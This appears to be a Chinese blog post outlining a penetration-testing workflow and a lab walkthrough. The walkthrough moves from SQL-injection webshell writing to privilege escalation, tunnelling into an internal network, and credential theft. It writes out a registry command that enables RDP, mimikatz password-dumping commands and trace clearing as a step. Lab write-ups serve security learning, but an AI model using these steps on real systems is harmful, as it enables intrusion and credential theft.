渗透测试流程
1.确定目标
2.信息收集(收集资产):域名,IP,端口,谷歌语法敏感文件,旁站,C段,目录
3.漏洞探测
4.漏洞利用getshell
5.权限提升
6.清理痕迹
7.提交漏洞或上交报告
靶场实操
发现sql注入,可以使用into outfile()
,into dumpfile()
将搜索语句导出到文件
先报错,得到网站的绝对路径

然后通过sql注入写入shell


成功写入一句话

连接菜刀
webshell管理工具(菜刀,蚁剑,冰蝎,哥斯拉,c刀,开山斧)
连接远程桌面(完全控制)
条件:
- 拥有管理员账号(添加)
- 确定远程服务开启(3389)
- 连接成功
netstat -ano
查看端口开放情况
tasklist
查看进程 PID -- 进程
开启和关闭3389端口
(1)开启3389端口:
在cmd内,执行如下命令,即可开启3389端口。
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f
(2)关闭3389端口:
在cmd内,执行如下命令,即可关闭3389端口。
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 11111111 /f
正向连接:可以PHP当中间站
反向连接:需要目标有网
这里使用的是懒土豆提权,创建一个管理员账户

然后使用 reGeorg对服务器进行一个映射,使得我可以通过php文件来将数据包转发到这台服务器上
然后使用proxifier代理将我对远程桌面的数据包转发到服务器上,于是就穿透了内网,进行连接

探测内网

10.0.1.1 00-0c-29-10-02-aa
10.0.1.3 00-0c-29-4f-81-ae
10.0.1.5 00-0c-29-17-f5-7e
简单获得几个内网地址,如果使用nmap会更准确
端口扫描
内网端口可能开了xxx网站,xxx服务
C:\Program Files (x86)\Nmap
获取administrator账户密码
mimikatz还可以执行哈希传递,票证传递或构建Golden票证。
privilege::debug 提升权限
sekurlsa::logonpasswords 抓取密码
log 日志会记录内容
Comments NOTHING